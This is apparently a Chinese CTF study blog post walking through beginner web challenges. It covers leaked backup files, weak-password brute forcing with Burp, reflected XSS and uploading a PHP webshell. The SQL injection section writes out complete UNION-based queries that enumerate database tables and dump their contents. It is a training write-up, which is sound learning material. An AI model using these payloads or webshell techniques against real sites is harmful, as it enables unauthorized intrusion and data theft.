0
点赞
收藏
分享

微信扫一扫

CTF学习(二)——信息泄露、密码口令、SQL注入、文件上传

一葉_code 2022-02-28 阅读 52

一、信息泄露

在这里插入图片描述
1.1目录遍历
①点开题目后依次点开各目录,遍历后发现flag文件得旗
在这里插入图片描述

在这里插入图片描述

1.2 PHPINFO
①在长篇文件中查找flag得旗

在这里插入图片描述

1.3备份文件下载
1.3.1 网站源码
①由提示下载文件www.zip后得到一份flag文件

在这里插入图片描述

在这里插入图片描述

②flag文件中无flag,访问该文件名得旗

在这里插入图片描述

1.3.2 bak文件
①访问index.php.bak,通过HBuilder X打开文件得旗

在这里插入图片描述

在这里插入图片描述

1.3.3 vim缓存
①访问.index.php.swp(注意.),保存文件
在这里插入图片描述

②通过HBuilder X打开文件得旗

在这里插入图片描述

1.3.4 .DS_Store
①访问.DS_Store,用记事本打开文件

在这里插入图片描述
在这里插入图片描述

②访问记事本中所得文件夹名称后得旗
在这里插入图片描述

二、密码口令

在这里插入图片描述

2.1 弱口令
①用户名为admin,随意输入密码后通过burp抓包,点击send to intruder后选择爆破对象,添加弱口令字典
在这里插入图片描述

②点击attack开始爆破,得旗

在这里插入图片描述

2.2 默认口令
①查找该公司默认口令,输入后得旗
在这里插入图片描述
在这里插入图片描述

三、SQL注入

3.1 整数型注入
①分别输入1,1 and 1=1,1 and 1=2,分别得到如下结果,后者返回值与前两者不同,说明存在注入点。
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

②输入1 order by 1,1 order by 2,返回结果相同,输入1 order by 3返回结果不同,证明字段数为2。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

③输入-1 union select 1,database(),爆出数据库名:
在这里插入图片描述

④输入-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema=‘sqli’,爆出sqli库中的表名:
在这里插入图片描述

⑤输入-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘flag’,爆出列名:
在这里插入图片描述

⑥输入-1 union select 1,group_concat(flag) from sqli.flag,爆出字段内容,得旗
在这里插入图片描述

四、XSS

4.1 反射型
①注册XSS测试平台,新建项目后复制如下图代码

②将题目网站name=后内容改为上图粘贴代码后点击send

③返回XSS平台展开记录,得旗

5 文件上传
5.1 无验证
① 利用记事本编写php文件如下图,并上传得到绝对路径
在这里插入图片描述
在这里插入图片描述

②复制该路径并在蚁剑中添加数据,得到如下图
在这里插入图片描述

③展开该数据得到flag文件得旗
在这里插入图片描述

在这里插入图片描述

举报

相关推荐

0 条评论